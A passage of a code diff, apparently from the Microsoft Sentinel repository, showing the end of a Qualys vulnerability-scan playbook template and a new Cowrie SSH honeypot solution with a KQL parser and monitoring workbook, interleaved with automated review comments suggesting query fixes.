] + }, + "OS": { + "type": [ + "object", + "string", + "null" + ] + }, + "OWNER": { + "type": [ + "object", + "string", + "null" + ] + }, + "QG_HOSTID": { + "type": [ + "object", + "string", + "null" + ] + }, + "TAGS": { + "properties": { + "TAG": { + "properties": { + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "TAG_ID": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TRACKING_METHOD": { + "type": [ + "object", + "string", + "null" + ] + }, + "USER_DEF": { + "properties": { + "LABEL_1": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_2": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_3": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE_1": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_2": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_3": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "ID_SET": { + "properties": { + "ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "ID_RANGE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "WARNING": { + "properties": { + "CODE": { + "type": [ + "object", + "string", + "null" + ] + }, + "TEXT": { + "type": [ + "object", + "string", + "null" + ] + }, + "URL": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + } 
+ }, + "runAfter": { + "Initialize_variable_-_IncidentComment": [ + "Succeeded" + ] + }, + "type": "Foreach", + "runtimeConfiguration": { + "concurrency": { + "repetitions": 1 + } + } + }, + "Get_Report_Status": { + "runAfter": { + "Delay_1_Minute": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE'])" + } + } + }, + "Initialize_variable_-_IPAddrToScan": { + "runAfter": { + "Initialize_variable_-_IPAddresses": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IPAddrToScan", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_IPAddresses": { + "runAfter": { + "Entities_-_Get_IPs": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IPAddresses", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_IncidentComment": { + "runAfter": { + "Initialize_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IncidentComment", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ReportStatus": { + "runAfter": { + "Initialize_variable_-_ScanStatus": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ReportStatus", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ScanRef": { + "runAfter": { + "Initialize_variable_-_Scanner": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ScanRef", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ScanStatus": { + "runAfter": { + 
"Initialize_variable_-_ScanRef": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ScanStatus", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_Scanner": { + "runAfter": { + "Initialize_variable_-_IPAddrToScan": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "Scanner", + "type": "string", + "value": "null" + } + ] + } + }, + "Launch_VM_Scan_Report": { + "runAfter": { + "Parse_Scan_Report_Template_Output": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "launch", + "output_format": "pdf", + "report_title": "@{concat('ScanReport_', utcNow())}", + "report_type": "Scan", + "template_id": "@body('Parse_Scan_Report_Template_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Parse_Launch_Scan_Report_Output": { + "runAfter": { + "Launch_VM_Scan_Report": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Launch_VM_Scan_Report')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "REQUEST": { + "properties": { + "DATETIME": { + "type": "string" + }, + "PARAM_LIST": { + "properties": { + "PARAM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "POST_DATA": { + "type": "string" + }, + "RESOURCE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + }, + "RESPONSE": { + "properties": { + "CODE": { + "type": "string" + }, + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": 
"string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Report_Status": { + "runAfter": { + "Get_Report_Status": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Scan_Report_Template_Output": { + "runAfter": { + "Create_Scan_Report_Template": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Scan_Report_Template')))", + "schema": { + "properties": { + "!DOCTYPE": { + "properties": { + "@@name": { + "type": "string" + }, + "@@system": { + "type": "string" + } + }, + "type": "object" + }, + "?xml": { + "properties": { + "@@encoding": { + "type": "string" + }, + "@@version": { + "type": "string" + } + }, + "type": "object" + }, + "SIMPLE_RETURN": { + "properties": { + 
"RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Set_variable_-_ReportStatus": { + "runAfter": { + "Parse_Report_Status": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + }, + "Wait_Until_Report_Generation_is_Finished": { + "actions": { + "Delay_for_3_minutes": { + "type": "Wait", + "inputs": { + "interval": { + "count": 3, + "unit": "Minute" + } + } + }, + "Get_Report_Status_Again": { + "runAfter": { + "Delay_for_3_minutes": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE'])" + } + } + }, + "Parse_Report_Status_Again": { + "runAfter": { + "Get_Report_Status_Again": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status_Again')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": 
"string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Update_variable_-_ReportStatus": { + "runAfter": { + "Parse_Report_Status_Again": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status_Again')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + } + }, + "runAfter": { + "Set_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "expression": "@equals(variables('ReportStatus'), 'Finished')", + "limit": { + "count": 60, + "timeout": "PT3H" + }, + "type": "Until" + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azureblob": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "connectionName": "[[variables('AzureblobConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]" + }, + 
"azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "tags": { + "hidden-SentinelTemplateName": "QualysVM-LaunchVMScan-GenerateReport", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('AzureblobConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('AzureblobConnectionName')]", + "api": { + "id": "[[variables('_connection-3')]" + }, + "parameterValues": { + "accountName": 
"[[variables('AzureBlobStorageName')]", + "accessKey": "[[listKeys(variables('StorageAccountId'), '2019-04-01').keys[0].value]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-4')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId5'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId5')]", + "contentId": "[variables('_playbookContentId5')]", + "kind": "Playbook", + "version": "[variables('playbookVersion5')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-LaunchVMScan-GenerateReport", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Get IP Addresses from incident. \n 2. Scan IP Addresses with Qualys Scanner. \n 3. Generate the Scan Report. \n 4. Download the report and store it to a blob storage. \n 5. Add the link of report as a comment to the incident.", + "prerequisites": [ + "1. 
Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-13T22:25:52Z", + "entities": [ + "IP" + ], + "tags": [ + "Qualys", + "Enrichment", + "VM Scan" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId5')]", + "contentKind": "Playbook", + "displayName": "QualysVM-LaunchVMScan-GenerateReport", + "contentProductId": "[variables('_playbookcontentProductId5')]", + "id": "[variables('_playbookcontentProductId5')]", + "version": "[variables('playbookVersion5')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentPackages", + "apiVersion": "2023-04-01-preview", + "location": "[parameters('workspace-location')]", + "properties": { + "version": "3.0.0", + "kind": "Solution", + "contentSchemaVersion": "3.0.0", + "displayName": "QualysVM", + "publisherDisplayName": "Microsoft Sentinel, Microsoft Corporation", + "descriptionHtml": "

Note: Please refer to the following before installing the solution:

\n

• Review the solution Release Notes

\n

• There may be known issues pertaining to this Solution, please refer to them before installing.

\n

The Qualys Vulnerability Management solution for Microsoft Sentinel enables you to ingest host vulnerability detection data into Microsoft Sentinel.

\n

Underlying Microsoft Technologies used:

\n

This solution takes a dependency on the following technologies, and some of these dependencies either may be in Preview state or might result in additional ingestion or operational costs:

\n
    \n
  1. Azure Monitor HTTP Data Collector API

    \n
  2. \n
  3. Azure Functions

    \n
  4. \n
\n

Data Connectors: 1, Workbooks: 1, Analytic Rules: 2, Custom Azure Logic Apps Connectors: 1, Playbooks: 4

\n

Learn more about Microsoft Sentinel | Learn more about Solutions

\n", + "contentKind": "Solution", + "contentProductId": "[variables('_solutioncontentProductId')]", + "id": "[variables('_solutioncontentProductId')]", + "icon": "", + "contentId": "[variables('_solutionId')]", + "parentId": "[variables('_solutionId')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "operator": "AND", + "criteria": [ + { + "kind": "DataConnector", + "contentId": "[variables('_dataConnectorContentId1')]", + "version": "[variables('dataConnectorVersion1')]" + }, + { + "kind": "Workbook", + "contentId": "[variables('_workbookContentId1')]", + "version": "[variables('workbookVersion1')]" + }, + { + "kind": "AnalyticsRule", + "contentId": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "version": "[variables('analyticRuleObject1').analyticRuleVersion1]" + }, + { + "kind": "AnalyticsRule", + "contentId": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "version": "[variables('analyticRuleObject2').analyticRuleVersion2]" + }, + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-GetAssetDetails')]", + "version": "[variables('playbookVersion2')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-GetAssets-ByCVEID')]", + "version": "[variables('playbookVersion3')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-GetAssets-ByOpenPort')]", + "version": "[variables('playbookVersion4')]" + }, + { + "kind": "Playbook", + "contentId": "[variables('_QualysVM-LaunchVMScan-GenerateReport')]", + "version": 
"[variables('playbookVersion5')]"
+ }
+ ]
+ },
+ "firstPublishDate": "2020-12-14",
+ "lastPublishDate": "2022-09-30",
+ "providers": [
+ "Qualys"
+ ],
+ "categories": {
+ "domains": [
+ "Security - Vulnerability Management",
+ "Security - Automation (SOAR)"
+ ]
+ }
+ },
+ "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/', variables('_solutionId'))]"
+ }
+ ],
+ "outputs": {}
+}
diff --git a/Solutions/Sensor SSH Cowrie/Package/testParameters.json b/Solutions/Sensor SSH Cowrie/Package/testParameters.json
new file mode 100644
index 00000000000..aa285f95585
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/Package/testParameters.json
@@ -0,0 +1,32 @@
+{
+ "location": {
+ "type": "string",
+ "minLength": 1,
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Not used, but needed to pass arm-ttk test `Location-Should-Not-Be-Hardcoded`. We instead use the `workspace-location` which is derived from the LA workspace"
+ }
+ },
+ "workspace-location": {
+ "type": "string",
+ "defaultValue": "",
+ "metadata": {
+ "description": "[concat('Region to deploy solution resources -- separate from location selection',parameters('location'))]"
+ }
+ },
+ "workspace": {
+ "defaultValue": "",
+ "type": "string",
+ "metadata": {
+ "description": "Workspace name for Log Analytics where Microsoft Sentinel is setup"
+ }
+ },
+ "workbook1-name": {
+ "type": "string",
+ "defaultValue": "Cowrie",
+ "minLength": 1,
+ "metadata": {
+ "description": "Name for the workbook"
+ }
+ }
+}
diff --git a/Solutions/Sensor SSH Cowrie/Parsers/CowrieEvents.yaml b/Solutions/Sensor SSH Cowrie/Parsers/CowrieEvents.yaml
new file mode 100644
index 00000000000..f154d193f1a
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/Parsers/CowrieEvents.yaml
@@ -0,0 +1,12 @@
+id: 2a6da7ac-e5fd-4eba-9a49-e6f069c838c8
+Function:
+ Title: Parser for Cowrie
+ Version: '1.0.0'
+ LastUpdated: '2024-09-19'
+Category: Microsoft Sentinel Parser
+FunctionName: Cowrie
+FunctionAlias: Cowrie
+FunctionQuery: |
+ newCowrie_CL
+ | extend EventID = tostring(parse_json(RawData).eventid), URL = tostring(parse_json(RawData).url), Outfile = tostring(parse_json(RawData).outfile), Sha256Value = tostring(parse_json(RawData).shasum), Sensor = tostring(parse_json(RawData).sensor), Message = tostring(parse_json(RawData).message), SourceIP = tostring(parse_json(RawData).src_ip), SessionID = tostring(parse_json(RawData).session)
+ | project EventID, URL, Outfile, Sha256Value, Sensor, Message, SourceIP, SessionID
\ No newline at end of file
diff --git a/Solutions/Sensor SSH Cowrie/ReleaseNotes.md b/Solutions/Sensor SSH Cowrie/ReleaseNotes.md
new file mode 100644
index 00000000000..dd873bf3cc3
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/ReleaseNotes.md
@@ -0,0 +1,3 @@
+| **Version** | **Date Modified (DD-MM-YYYY)** | **Change History** |
+|-------------|--------------------------------|---------------------------------------------------------------|
+| 1.0.0 | 19-09-2024 | Added intial Sensor SSH Cowrie Solution from Hackathon 2024 |
\ No newline at end of file
diff --git a/Solutions/Sensor SSH Cowrie/SolutionMetadata.json b/Solutions/Sensor SSH Cowrie/SolutionMetadata.json
new file mode 100644
index 00000000000..c84f870c1a7
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/SolutionMetadata.json
@@ -0,0 +1,16 @@
+{
+ "publisherId": "azuresentinel",
+ "offerId": "azure-sentinel-sensor-ssh-cowrie",
+ "firstPublishDate": "2024-09-19",
+ "lastPublishDate": "2024-09-19",
+ "providers": ["Microsoft"],
+ "categories": {
+ "domains": ["Security - Sensor"]
+ },
+ "support": {
+ "name": "Microsoft Corporation",
+ "email": "support@microsoft.com",
+ "tier": "Microsoft",
+ "link": "https://support.microsoft.com"
+ }
+}
\ No newline at end of file
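Review bot: The final `| project` in FunctionQuery of Parsers/CowrieEvents.yaml drops TimeGenerated, so analytic rules and workbooks that query through the `Cowrie` function lose the column Sentinel's scheduled rules filter on for their lookback period; keep it with `| project TimeGenerated, EventID, URL, Outfile, Sha256Value, Sensor, Message, SourceIP, SessionID`. The `extend` also calls parse_json(RawData) eight times on the same value; parsing once with `| extend Parsed = parse_json(RawData)` and then reading `Parsed.eventid`, `Parsed.url` and so on is cheaper and easier to maintain. The workbook in this same change reads `timestamp` and `duration` from RawData directly, so exposing those here too would let rules and workbooks share one schema instead of each re-parsing the raw event. A naming nit: the file is CowrieEvents.yaml while FunctionName and FunctionAlias are `Cowrie`.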
diff --git a/Solutions/Sensor SSH Cowrie/Workbooks/Cowrie.json b/Solutions/Sensor SSH Cowrie/Workbooks/Cowrie.json
new file mode 100644
index 00000000000..4ae3b554300
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/Workbooks/Cowrie.json
@@ -0,0 +1,161 @@
+{
+ "version": "Notebook/1.0",
+ "items": [
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "union withsource=_TableName *\n| summarize Count=count() by _TableName\n| render barchart",
+ "size": 1,
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces"
+ },
+ "name": "query - 2"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "newCowrie_CL\r\n| extend SourceIP = tostring(parse_json(RawData).src_ip)\r\n| summarize TotalSessions = count() by SourceIP\r\n| order by TotalSessions desc\r\n",
+ "size": 0,
+ "title": "Total Sessions by Source IP",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces",
+ "visualization": "piechart",
+ "gridSettings": {
+ "sortBy": [
+ {
+ "itemKey": "SourceIP",
+ "sortOrder": 1
+ }
+ ]
+ },
+ "sortBy": [
+ {
+ "itemKey": "SourceIP",
+ "sortOrder": 1
+ }
+ ]
+ },
+ "name": "query - 2"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "newCowrie_CL\r\n| extend EventID = tostring(parse_json(RawData).eventid)\r\n| summarize EventCount = count() by EventID\r\n| order by EventCount desc\r\n",
+ "size": 0,
+ "title": "Event Type Distribution",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces",
+ "visualization": "areachart"
+ },
+ "name": "query - 3"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "newCowrie_CL\r\n| extend Timestamp = todatetime(parse_json(RawData).timestamp)\r\n| summarize TotalSessions = count() by bin(Timestamp, 1h)\r\n| order by Timestamp\r\n",
+ "size": 0,
+ "title": "Session Trends Over Time",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces",
+ "visualization": "table"
+ },
+ "name": "query - 4"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": 
"KqlItem/1.0",
+ "query": "newCowrie_CL\r\n| extend EventID = tostring(parse_json(RawData).eventid), Timestamp = todatetime(parse_json(RawData).timestamp)\r\n| where EventID == \"cowrie.login.success\"\r\n| summarize SuccessfulLogins = count() by bin(Timestamp, 1h)\r\n| order by Timestamp\r\n",
+ "size": 0,
+ "title": "Successful Login Attempts Over Time",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces",
+ "visualization": "barchart"
+ },
+ "name": "query - 5"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "newCowrie_CL\r\n| extend EventID = tostring(parse_json(RawData).eventid), SourceIP = tostring(parse_json(RawData).src_ip)\r\n| where EventID == \"cowrie.login.failed\"\r\n| summarize FailedLogins = count() by SourceIP\r\n| order by FailedLogins desc\r\n",
+ "size": 0,
+ "title": "Failed Login Attempts",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces"
+ },
+ "name": "query - 6"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "newCowrie_CL\r\n| extend Duration = todouble(parse_json(RawData).duration), SourceIP = tostring(parse_json(RawData).src_ip)\r\n| summarize AvgDuration = avg(Duration) by SourceIP\r\n| order by AvgDuration desc\r\n",
+ "size": 0,
+ "title": "Session Duration Analysis",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces",
+ "visualization": "categoricalbar"
+ },
+ "name": "query - 7"
+ },
+ {
+ "type": 3,
+ "content": {
+ "version": "KqlItem/1.0",
+ "query": "let GeoLocationData = datatable(SourceIP: string, Country: string, Latitude: real, Longitude: real)\r\n[\r\n \"115.99.242.123\", \"India\", 12.97623, 77.60329,\r\n \"162.142.125.41\", \"USA\", 42.25986, -83.7199\r\n];\r\nnewCowrie_CL\r\n| extend SourceIP = tostring(parse_json(RawData).src_ip)\r\n| 
join kind=inner (GeoLocationData) on SourceIP\r\n| summarize LoginAttempts = count() by Country, Latitude, Longitude\r\n| order by LoginAttempts desc\r\n",
+ "size": 0,
+ "title": "Login Attempts by Country",
+ "timeContext": {
+ "durationMs": 86400000
+ },
+ "queryType": 0,
+ "resourceType": "microsoft.operationalinsights/workspaces",
+ "visualization": "map",
+ "mapSettings": {
+ "locInfo": "LatLong",
+ "locInfoColumn": "Country",
+ "latitude": "Latitude",
+ "longitude": "Longitude",
+ "sizeSettings": "LoginAttempts",
+ "sizeAggregation": "Sum",
+ "labelSettings": "Country",
+ "legendMetric": "LoginAttempts",
+ "legendAggregation": "Sum",
+ "itemColorSettings": {
+ "nodeColorField": "LoginAttempts",
+ "colorAggregation": "Sum",
+ "type": "heatmap",
+ "heatmapPalette": "greenRed"
+ }
+ }
+ },
+ "name": "query - 7"
+ }
+ ],
+ "fallbackResourceIds": [],
+ "fromTemplateId": "sentinel-Cowrie",
+ "$schema": "https://github.com/Microsoft/Application-Insights-Workbooks/blob/master/schema/workbook.json"
+}
\ No newline at end of file
diff --git a/Solutions/Sensor SSH Cowrie/data/Solution_Cowrie.json b/Solutions/Sensor SSH Cowrie/data/Solution_Cowrie.json
new file mode 100644
index 00000000000..cdbe0b218c5
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/data/Solution_Cowrie.json
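Review bot: The "Login Attempts by Country" tile in Workbooks/Cowrie.json joins newCowrie_CL against a hard-coded two-row `GeoLocationData` datatable, so the map only ever plots those two source IPs and the `kind=inner` join silently drops every other address; the built-in `geo_info_from_ip_literal()` resolves any IP. Replacing the datatable and the join with `| extend Geo = geo_info_from_ip_literal(SourceIP)` followed by `| extend Country = tostring(Geo.country), Latitude = toreal(Geo.latitude), Longitude = toreal(Geo.longitude)` leaves the summarize and the mapSettings unchanged. The same tile counts every event type rather than login attempts, so the title overstates it — extend `EventID` and filter on it before summarizing, as the "Successful Login Attempts Over Time" tile does. Separately, the first tile's `union withsource=_TableName *` scans every table in the workspace rather than this solution's data and can be expensive on a large workspace, and the item names "query - 2" and 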